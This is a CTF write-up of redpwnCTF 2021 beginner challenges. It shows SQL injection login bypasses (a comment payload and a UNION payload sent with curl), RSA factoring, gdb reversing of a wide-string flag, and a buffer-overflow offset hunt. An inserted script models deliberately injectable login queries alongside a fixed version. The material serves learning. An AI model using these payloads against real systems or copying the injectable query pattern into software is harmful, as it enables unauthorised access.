redpwnCTF 2021 Writeup

This CTF ran from 2021/7/10 4:00 (JST) to 2021/7/13 4:00 (JST).
I played with my team again this time; we finished 52nd of 1418 teams with 2341 points.
Below are writeups for the challenges I solved myself.

sanity-check (misc)

The flag was written in the challenge description.

flag{1_l0v3_54n17y_ch3ck_ch4ll5}

discord (misc)

Join the Discord and look at the topic of the #rules channel: the flag is written there.

flag{chall3n63_au7h0r5h1p_1nfl4710n}

inspect-me (web)

Viewing the HTML source, the flag is in a comment.

  <!-- flag{inspect_me_like_123} -->
flag{inspect_me_like_123}

compliant-lattice-feline (misc)

Just connect with nc.

$ nc mc.ax 31443
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}

scissor (crypto)

You can guess it just from the look of the ciphertext, but the attached script confirms it is a Caesar cipher. Decode it with https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipher.

Rotation 12:
surround_this_flag_with_flag_format
flag{surround_this_flag_with_flag_format}
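The web tool above shows all 26 rotations and leaves picking the right one to the eye. As an added example (not part of the original writeup), the following script brute-forces every rotation and selects the one whose letter histogram is closest to English with a chi-squared test. The challenge's ciphertext is not reproduced on this page, so the known plaintext is re-encrypted with rotation 12 as a constructed sample; the shift direction is this script's own convention, not necessarily the tool's.

```python
# Added example (not from the original writeup): brute-force a Caesar cipher
# and pick the rotation automatically with a chi-squared test against
# English letter frequencies, instead of reading all 26 candidates by eye.
from string import ascii_lowercase

# Relative frequencies of letters in English text (a..z), in percent.
ENGLISH_FREQ = [8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.15, 0.8, 4.0, 2.4,
                6.7, 7.5, 1.9, 0.1, 6.0, 6.3, 9.1, 2.8, 1.0, 2.4, 0.15, 2.0, 0.07]


def caesar_shift(text: str, k: int) -> str:
    """Rotate every ASCII letter forward by k; other characters pass through."""
    out = []
    for ch in text:
        if ch.islower():
            out.append(chr((ord(ch) - ord('a') + k) % 26 + ord('a')))
        elif ch.isupper():
            out.append(chr((ord(ch) - ord('A') + k) % 26 + ord('A')))
        else:
            out.append(ch)
    return ''.join(out)


def decrypt(ciphertext: str, k: int) -> str:
    """Undo a forward rotation by k."""
    return caesar_shift(ciphertext, -k)


def chi_squared(text: str) -> float:
    """Distance of the letter histogram of text from English; lower is better."""
    letters = [c for c in text.lower() if c in ascii_lowercase]
    n = len(letters)
    if n == 0:
        return float('inf')
    score = 0.0
    for i, c in enumerate(ascii_lowercase):
        expected = n * ENGLISH_FREQ[i] / 100.0
        observed = letters.count(c)
        score += (observed - expected) ** 2 / expected
    return score


def best_shift(ciphertext: str) -> int:
    """Return the rotation whose decryption looks most like English."""
    return min(range(26), key=lambda k: chi_squared(decrypt(ciphertext, k)))


# Constructed sample: the challenge ciphertext is not in the writeup, so the
# known plaintext is re-encrypted here with rotation 12 (an assumption).
PLAINTEXT = 'surround_this_flag_with_flag_format'
CIPHERTEXT = caesar_shift(PLAINTEXT, 12)

if __name__ == '__main__':
    for k in range(26):
        print(f'{k:2d}: {decrypt(CIPHERTEXT, k)}')
    k = best_shift(CIPHERTEXT)
    print(f'best rotation {k}: flag{{{decrypt(CIPHERTEXT, k)}}}')
```

With only 30 letters the statistic is noisy, but any wrong rotation lands several common letters on j, q, x or z, whose expected counts are near zero, so the correct rotation wins by a wide margin.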

orm-bad (web)

If you can log in with username "admin", the flag is displayed. SQL injection: the single quote closes the string and `--` comments out the rest of the query, including the password check. Logging in with the input below displayed the flag.

Username: admin' --
Password: (空)
flag{sqli_overused_again_0b4f6}

wstrings (rev)

$ gdb -q ./wstrings
Reading symbols from ./wstrings...(no debugging symbols found)...done.
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x55555555481a (<main>:	push   rbp)
RBX: 0x0 
RCX: 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RDX: 0x7fffffffdf38 --> 0x7fffffffe27a ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
RDI: 0x1 
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RIP: 0x55555555481e (<main+4>:	sub    rsp,0x150)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x555555554710 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554815 <frame_dummy+5>:	
    jmp    0x555555554780 <register_tm_clones>
   0x55555555481a <main>:	push   rbp
   0x55555555481b <main+1>:	mov    rbp,rsp
=> 0x55555555481e <main+4>:	sub    rsp,0x150
   0x555555554825 <main+11>:	mov    rax,QWORD PTR fs:0x28
   0x55555555482e <main+20>:	mov    QWORD PTR [rbp-0x8],rax
   0x555555554832 <main+24>:	xor    eax,eax
   0x555555554834 <main+26>:	lea    rdi,[rip+0x185]        # 0x5555555549c0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
0008| 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0016| 0x7fffffffde50 --> 0x1 
0024| 0x7fffffffde58 --> 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
0032| 0x7fffffffde60 --> 0x100008000 
0040| 0x7fffffffde68 --> 0x55555555481a (<main>:	push   rbp)
0048| 0x7fffffffde70 --> 0x0 
0056| 0x7fffffffde78 --> 0xdec3a62e07b837fc 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x000055555555481e in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
   0x000055555555481a <+0>:	push   rbp
   0x000055555555481b <+1>:	mov    rbp,rsp
=> 0x000055555555481e <+4>:	sub    rsp,0x150
   0x0000555555554825 <+11>:	mov    rax,QWORD PTR fs:0x28
   0x000055555555482e <+20>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000555555554832 <+24>:	xor    eax,eax
   0x0000555555554834 <+26>:	lea    rdi,[rip+0x185]        # 0x5555555549c0
   0x000055555555483b <+33>:	mov    eax,0x0
   0x0000555555554840 <+38>:	call   0x5555555546f0 <wprintf@plt>
   0x0000555555554845 <+43>:	mov    rdx,QWORD PTR [rip+0x2007e4]        # 0x555555755030 <stdin@@GLIBC_2.2.5>
   0x000055555555484c <+50>:	lea    rax,[rbp-0x150]
   0x0000555555554853 <+57>:	mov    esi,0x50
   0x0000555555554858 <+62>:	mov    rdi,rax
   0x000055555555485b <+65>:	call   0x5555555546c0 <fgetws@plt>
   0x0000555555554860 <+70>:	mov    rax,QWORD PTR [rip+0x2007a9]        # 0x555555755010 <flag>
   0x0000555555554867 <+77>:	lea    rdx,[rbp-0x150]
   0x000055555555486e <+84>:	mov    rsi,rdx
   0x0000555555554871 <+87>:	mov    rdi,rax
   0x0000555555554874 <+90>:	call   0x5555555546b0 <wcscmp@plt>
   0x0000555555554879 <+95>:	test   eax,eax
   0x000055555555487b <+97>:	jne    0x555555554893 <main+121>
   0x000055555555487d <+99>:	mov    rax,QWORD PTR [rip+0x20079c]        # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x0000555555554884 <+106>:	mov    rsi,rax
   0x0000555555554887 <+109>:	lea    rdi,[rip+0x1ea]        # 0x555555554a78
   0x000055555555488e <+116>:	call   0x5555555546e0 <fputws@plt>
   0x0000555555554893 <+121>:	mov    eax,0x0
   0x0000555555554898 <+126>:	mov    rcx,QWORD PTR [rbp-0x8]
   0x000055555555489c <+130>:	xor    rcx,QWORD PTR fs:0x28
   0x00005555555548a5 <+139>:	je     0x5555555548ac <main+146>
   0x00005555555548a7 <+141>:	call   0x5555555546d0 <__stack_chk_fail@plt>
   0x00005555555548ac <+146>:	leave  
   0x00005555555548ad <+147>:	ret    
End of assembler dump.
gdb-peda$ b *0x0000555555554874 ★ breakpoint at the comparison
Breakpoint 2 at 0x555555554874
gdb-peda$ c
Continuing.
Welcome to flag checker 1.0.
Give me a flag> hoge

[----------------------------------registers-----------------------------------]
RAX: 0x555555554938 --> 0x6c00000066 ('f')
RBX: 0x0 
RCX: 0x1 
RDX: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RSI: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RDI: 0x555555554938 --> 0x6c00000066 ('f')
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RIP: 0x555555554874 (<main+90>:	call   0x5555555546b0 <wcscmp@plt>)
R8 : 0x555555757aa4 --> 0x0 
R9 : 0x7fffffffdb48 --> 0x7fffffffdb60 --> 0x1000 
R10: 0x4 
R11: 0x4 
R12: 0x555555554710 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554867 <main+77>:	lea    rdx,[rbp-0x150]
   0x55555555486e <main+84>:	mov    rsi,rdx
   0x555555554871 <main+87>:	mov    rdi,rax
=> 0x555555554874 <main+90>:	call   0x5555555546b0 <wcscmp@plt>
   0x555555554879 <main+95>:	test   eax,eax
   0x55555555487b <main+97>:	jne    0x555555554893 <main+121>
   0x55555555487d <main+99>:	
    mov    rax,QWORD PTR [rip+0x20079c]        # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x555555554884 <main+106>:	mov    rsi,rax
Guessed arguments:
arg[0]: 0x555555554938 --> 0x6c00000066 ('f')
arg[1]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
arg[2]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcf0 --> 0x6f00000068 ('h')
0008| 0x7fffffffdcf8 --> 0x6500000067 ('g')
0016| 0x7fffffffdd00 --> 0xa ('\n')
0024| 0x7fffffffdd08 --> 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0032| 0x7fffffffdd10 --> 0x7fffffffde80 --> 0x555555554710 (<_start>:	xor    ebp,ebp)
0040| 0x7fffffffdd18 --> 0x7ffff7ffe710 --> 0x7ffff7ffb000 (jg     0x7ffff7ffb047)
0048| 0x7fffffffdd20 --> 0x0 
0056| 0x7fffffffdd28 --> 0x7ffff7dde39f (<_dl_lookup_symbol_x+319>:	add    rsp,0x30)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x0000555555554874 in main ()
gdb-peda$ x/s $rax
0x555555554938:	"f"
gdb-peda$ x/100s $rax
0x555555554938:	"f"
0x55555555493a:	""
0x55555555493b:	""
0x55555555493c:	"l"
0x55555555493e:	""
0x55555555493f:	""
0x555555554940:	"a"
0x555555554942:	""
0x555555554943:	""
0x555555554944:	"g"
0x555555554946:	""
0x555555554947:	""
0x555555554948:	"{"
0x55555555494a:	""
0x55555555494b:	""
0x55555555494c:	"n"
0x55555555494e:	""
0x55555555494f:	""
0x555555554950:	"0"
0x555555554952:	""
0x555555554953:	""
0x555555554954:	"t"
0x555555554956:	""
0x555555554957:	""
0x555555554958:	"_"
0x55555555495a:	""
0x55555555495b:	""
0x55555555495c:	"a"
0x55555555495e:	""
0x55555555495f:	""
0x555555554960:	"l"
0x555555554962:	""
0x555555554963:	""
0x555555554964:	"1"
0x555555554966:	""
0x555555554967:	""
0x555555554968:	"_"
0x55555555496a:	""
0x55555555496b:	""
0x55555555496c:	"s"
0x55555555496e:	""
0x55555555496f:	""
0x555555554970:	"t"
0x555555554972:	""
0x555555554973:	""
0x555555554974:	"r"
0x555555554976:	""
0x555555554977:	""
0x555555554978:	"1"
0x55555555497a:	""
0x55555555497b:	""
0x55555555497c:	"n"
0x55555555497e:	""
0x55555555497f:	""
0x555555554980:	"g"
0x555555554982:	""
0x555555554983:	""
0x555555554984:	"s"
0x555555554986:	""
0x555555554987:	""
0x555555554988:	"_"
0x55555555498a:	""
0x55555555498b:	""
0x55555555498c:	"a"
0x55555555498e:	""
0x55555555498f:	""
0x555555554990:	"r"
0x555555554992:	""
0x555555554993:	""
0x555555554994:	"3"
0x555555554996:	""
0x555555554997:	""
0x555555554998:	"_"
0x55555555499a:	""
0x55555555499b:	""
0x55555555499c:	"s"
0x55555555499e:	""
0x55555555499f:	""
0x5555555549a0:	"k"
0x5555555549a2:	""
0x5555555549a3:	""
0x5555555549a4:	"1"
0x5555555549a6:	""
0x5555555549a7:	""
0x5555555549a8:	"n"
0x5555555549aa:	""
0x5555555549ab:	""
0x5555555549ac:	"n"
0x5555555549ae:	""
0x5555555549af:	""
0x5555555549b0:	"y"
0x5555555549b2:	""
0x5555555549b3:	""
0x5555555549b4:	"}"
0x5555555549b6:	""
0x5555555549b7:	""
0x5555555549b8:	""
0x5555555549b9:	""
0x5555555549ba:	""
0x5555555549bb:	""

The flag is stored as a wide string: wchar_t is 4 bytes on x86-64 Linux, so every character is followed by three NUL bytes, which is why `x/s` shows one character per string (`x/ws $rax` would print it whole, and `strings -e L` finds it where plain `strings` does not). Concatenating the characters from the address in RAX gives the flag.

flag{n0t_al1_str1ngs_ar3_sk1nny}
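The dump above is what a wide string looks like in memory: one printable byte, then three NULs. As an added example (not from the original writeup), the scanner below finds such UTF-32LE strings in a binary blob the way `strings -e L` does, next to the ordinary single-byte scan that misses them. The sample .rodata bytes are constructed here, using the prompt and flag shown above.

```python
# Added example (not from the original writeup): find wide strings in a binary
# blob. On x86-64 Linux glibc, wchar_t is 4 bytes, so an L"..." literal is stored
# as UTF-32LE and every ASCII character is followed by three NUL bytes; a plain
# `strings` pass (7-bit single-byte encoding) skips right over it.
import re
from typing import List

MIN_LEN = 4  # same default minimum length that GNU strings uses

# Printable ASCII as one narrow byte, or as one UTF-32LE code unit.
_NARROW = re.compile(rb'[\x20-\x7e]{%d,}' % MIN_LEN)
_WIDE = re.compile(rb'(?:[\x20-\x7e]\x00\x00\x00){%d,}' % MIN_LEN)


def extract_ascii_strings(blob: bytes) -> List[str]:
    """Equivalent of `strings` with the default single-byte encoding."""
    return [m.group().decode('ascii') for m in _NARROW.finditer(blob)]


def extract_wide_strings(blob: bytes) -> List[str]:
    """Equivalent of `strings -e L` (32-bit little-endian wide characters)."""
    return [m.group().decode('utf-32-le') for m in _WIDE.finditer(blob)]


# Constructed sample .rodata: a narrow C string, a few non-string bytes, and
# two L"..." wide strings laid out the way the gdb dump above shows them.
SAMPLE_RODATA = (
    b'not a wide string\x00'
    + bytes([0x48, 0x83, 0xec, 0x08, 0x00, 0x00, 0x00, 0x00])
    + 'Give me a flag> '.encode('utf-32-le') + b'\x00\x00\x00\x00'
    + 'flag{n0t_al1_str1ngs_ar3_sk1nny}'.encode('utf-32-le') + b'\x00\x00\x00\x00'
)

if __name__ == '__main__':
    print('narrow:', extract_ascii_strings(SAMPLE_RODATA))
    print('wide:  ', extract_wide_strings(SAMPLE_RODATA))
```

Run against the real binary with `extract_wide_strings(open('./wstrings', 'rb').read())` and the flag comes out without starting gdb at all.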

baby (crypto)

RSA. Factor n with factordb.

n = 228430203128652625114739053365339856393
  = 12546190522253739887 * 18207136478875858439

Then decrypt as usual.

from Crypto.Util.number import inverse, long_to_bytes

n = 228430203128652625114739053365339856393
e = 65537
c = 126721104148692049427127809839057445790
# factors of n, from factordb
p = 12546190522253739887
q = 18207136478875858439

phi = (p - 1) * (q - 1)
d = inverse(e, phi)   # private exponent
m = pow(c, d, n)

flag = long_to_bytes(m)
print(flag.decode())
flag{68ab82df34}

secure (web)

The script shows that the flag is displayed once you log in.

$ curl -X POST -d 'username=admin&password=a' https://secure.mc.ax/login
Found. Redirecting to /?message=Incorrect%20username%20or%20password.%20Query:%20SELECT%20id%20FROM%20users%20WHERE%0A%20%20%20%20%20%20%20%20%20%20username%20=%20'admin'%20AND%0A%20%20%20%20%20%20%20%20%20%20password%20=%20'a';

URL-decode it.

/?message=Incorrect username or password. Query: SELECT id FROM users WHERE
          username = 'admin' AND
          password = 'a';

That reveals the query. Because the statement contains line breaks, a `--` comment in the username only comments out the rest of its own line and leaves the password line dangling, so the injection has to go on the password line, with a comment to swallow the trailing quote.

$ curl -X POST -d "username=admin&password=' UNION SELECT 1 --" https://secure.mc.ax/login
Found. Redirecting to /?message=flag%7B50m37h1n6_50m37h1n6_cl13n7_n07_600d%7D
flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d}
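The orm-bad and secure sections above use two different payloads for the same class of bug, and the difference is the line breaks in the query. As an added example (not the challenge source), the script below models both query shapes on an in-memory SQLite database, shows that `admin' --` logs in against the single-line query but only produces a syntax error against the multi-line one, that `' UNION SELECT 1 --` in the password works against both, and that a parameterised query rejects both. The table layout and the "any returned row means logged in" rule are assumptions.

```python
# Added example (not from the original writeup): a model of the two login
# queries behind orm-bad and secure, built on an in-memory SQLite database.
# Table layout and the app's "any row == logged in" rule are assumptions.
import secrets
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)')
    # Constructed admin row with an unguessable password.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', ?)",
                 (secrets.token_hex(16),))
    return conn


def login_single_line(conn, username, password) -> bool:
    # orm-bad style: one line, so `--` comments out everything after it,
    # including the password check.
    query = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(query).fetchone() is not None


def login_multi_line(conn, username, password) -> bool:
    # secure style: the shape leaked in the redirect URL. `--` only comments
    # to end of line, so the password line survives an injection in the
    # username and has to be attacked on its own line.
    query = f"""SELECT id FROM users WHERE
          username = '{username}' AND
          password = '{password}';"""
    return conn.execute(query).fetchone() is not None


def login_parameterised(conn, username, password) -> bool:
    # Fixed version: user input is bound, never spliced into the SQL text.
    row = conn.execute('SELECT id FROM users WHERE username = ? AND password = ?',
                       (username, password)).fetchone()
    return row is not None


def probe(login, conn, username, password) -> str:
    """Classify an attempt as 'login', 'denied' or 'error' (broken SQL syntax)."""
    try:
        return 'login' if login(conn, username, password) else 'denied'
    except sqlite3.OperationalError:
        return 'error'


if __name__ == '__main__':
    conn = make_db()
    for name, fn in [('single-line', login_single_line),
                     ('multi-line', login_multi_line),
                     ('parameterised', login_parameterised)]:
        print(f"{name:14s} comment in username: {probe(fn, conn, chr(39).join(['admin', ' --']), '')}")
        print(f"{name:14s} UNION in password:   {probe(fn, conn, 'admin', chr(39) + ' UNION SELECT 1 --')}")
```

The `UNION SELECT 1` trick works because the application only checks whether any row came back, not whether the row belongs to the user it was asked about; a login routine that also compares the returned username (or, better, verifies a password hash in application code) would fail closed even if the injection succeeded.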

beginner-generic-pwn-number-0 (pwn)

Use the buffer overflow to overwrite inspirational_message_index so that it becomes -1.

$ file beginner-generic-pwn-number-0 
beginner-generic-pwn-number-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=954a4064a32902a83a98f211211c5eafdef2b3c0, for GNU/Linux 3.2.0, not stripped

$ gdb -q ./beginner-generic-pwn-number-0
Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done.
gdb-peda$ start

[----------------------------------registers-----------------------------------]
RAX: 0x4011f6 (<main>:	endbr64)
RBX: 0x0 
RCX: 0x4012c0 (<__libc_csu_init>:	endbr64)
RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
RDI: 0x1 
RBP: 0x4012c0 (<__libc_csu_init>:	endbr64)
RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
RIP: 0x4011f6 (<main>:	endbr64)
R8 : 0x7ffff7dced80 --> 0x0 
R9 : 0x7ffff7dced80 --> 0x0 
R10: 0x0 
R11: 0x0 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ec <__do_global_dtors_aux+44>:	nop    DWORD PTR [rax+0x0]
   0x4011f0 <frame_dummy>:	endbr64 
   0x4011f4 <frame_dummy+4>:	jmp    0x401180 <register_tm_clones>
=> 0x4011f6 <main>:	endbr64 
   0x4011fa <main+4>:	push   rbp
   0x4011fb <main+5>:	mov    rbp,rsp
   0x4011fe <main+8>:	sub    rsp,0x30
   0x401202 <main+12>:	mov    edi,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0008| 0x7fffffffde20 --> 0x1 
0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
0024| 0x7fffffffde30 --> 0x100008000 
0032| 0x7fffffffde38 --> 0x4011f6 (<main>:	endbr64)
0040| 0x7fffffffde40 --> 0x0 
0048| 0x7fffffffde48 --> 0x2c813c5a2d2779ff 
0056| 0x7fffffffde50 --> 0x401110 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004011f6 in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
=> 0x00000000004011f6 <+0>:	endbr64 
   0x00000000004011fa <+4>:	push   rbp
   0x00000000004011fb <+5>:	mov    rbp,rsp
   0x00000000004011fe <+8>:	sub    rsp,0x30
   0x0000000000401202 <+12>:	mov    edi,0x0
   0x0000000000401207 <+17>:	mov    eax,0x0
   0x000000000040120c <+22>:	call   0x4010e0 <time@plt>
   0x0000000000401211 <+27>:	mov    edi,eax
   0x0000000000401213 <+29>:	call   0x4010d0 <srand@plt>
   0x0000000000401218 <+34>:	call   0x401100 <rand@plt>
   0x000000000040121d <+39>:	cdqe   
   0x000000000040121f <+41>:	and    eax,0x1
   0x0000000000401222 <+44>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401226 <+48>:	mov    rax,QWORD PTR [rip+0x2e53]        # 0x404080 <stdout@@GLIBC_2.2.5>
   0x000000000040122d <+55>:	mov    esi,0x0
   0x0000000000401232 <+60>:	mov    rdi,rax
   0x0000000000401235 <+63>:	call   0x4010b0 <setbuf@plt>
   0x000000000040123a <+68>:	mov    rax,QWORD PTR [rip+0x2e4f]        # 0x404090 <stdin@@GLIBC_2.2.5>
   0x0000000000401241 <+75>:	mov    esi,0x0
   0x0000000000401246 <+80>:	mov    rdi,rax
   0x0000000000401249 <+83>:	call   0x4010b0 <setbuf@plt>
   0x000000000040124e <+88>:	mov    rax,QWORD PTR [rip+0x2e4b]        # 0x4040a0 <stderr@@GLIBC_2.2.5>
   0x0000000000401255 <+95>:	mov    esi,0x0
   0x000000000040125a <+100>:	mov    rdi,rax
   0x000000000040125d <+103>:	call   0x4010b0 <setbuf@plt>
   0x0000000000401262 <+108>:	mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000401266 <+112>:	lea    rdx,[rax*8+0x0]
   0x000000000040126e <+120>:	lea    rax,[rip+0x2deb]        # 0x404060 <inspirational_messages>
   0x0000000000401275 <+127>:	mov    rax,QWORD PTR [rdx+rax*1]
   0x0000000000401279 <+131>:	mov    rdi,rax
   0x000000000040127c <+134>:	call   0x4010a0 <puts@plt>
   0x0000000000401281 <+139>:	lea    rdi,[rip+0xec8]        # 0x402150
   0x0000000000401288 <+146>:	call   0x4010a0 <puts@plt>
   0x000000000040128d <+151>:	lea    rdi,[rip+0xf1c]        # 0x4021b0
   0x0000000000401294 <+158>:	call   0x4010a0 <puts@plt>
   0x0000000000401299 <+163>:	lea    rax,[rbp-0x30]
   0x000000000040129d <+167>:	mov    rdi,rax
   0x00000000004012a0 <+170>:	call   0x4010f0 <gets@plt>
   0x00000000004012a5 <+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x00000000004012aa <+180>:	jne    0x4012b8 <main+194>
   0x00000000004012ac <+182>:	lea    rdi,[rip+0xf35]        # 0x4021e8
   0x00000000004012b3 <+189>:	call   0x4010c0 <system@plt>
   0x00000000004012b8 <+194>:	mov    eax,0x0
   0x00000000004012bd <+199>:	leave  
   0x00000000004012be <+200>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004012a5
Breakpoint 2 at 0x4012a5
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
"&#120365;&#120358;&#120373;&#120372; &#120355;&#120371;&#120358;&#120354;&#120364; &#120373;&#120361;&#120358; &#120373;&#120371;&#120354;&#120357;&#120362;&#120373;&#120362;&#120368;&#120367; &#120368;&#120359; &#120365;&#120354;&#120372;&#120373; &#120366;&#120362;&#120367;&#120374;&#120373;&#120358; &#120356;&#120361;&#120354;&#120365;&#120365; &#120376;&#120371;&#120362;&#120373;&#120362;&#120367;&#120360;"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad208b 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a 
RDI: 0x0 
RBP: 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RSP: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x4012a5 (<main+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3 
R11: 0x246 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401299 <main+163>:	lea    rax,[rbp-0x30]
   0x40129d <main+167>:	mov    rdi,rax
   0x4012a0 <main+170>:	call   0x4010f0 <gets@plt>
=> 0x4012a5 <main+175>:	cmp    QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x4012aa <main+180>:	jne    0x4012b8 <main+194>
   0x4012ac <main+182>:	lea    rdi,[rip+0xf35]        # 0x4021e8
   0x4012b3 <main+189>:	call   0x4010c0 <system@plt>
   0x4012b8 <main+194>:	mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffdde8 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffddf0 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde00 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffde18 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x00000000004012a5 in main ()
gdb-peda$ patto bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL★RBP
bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 48

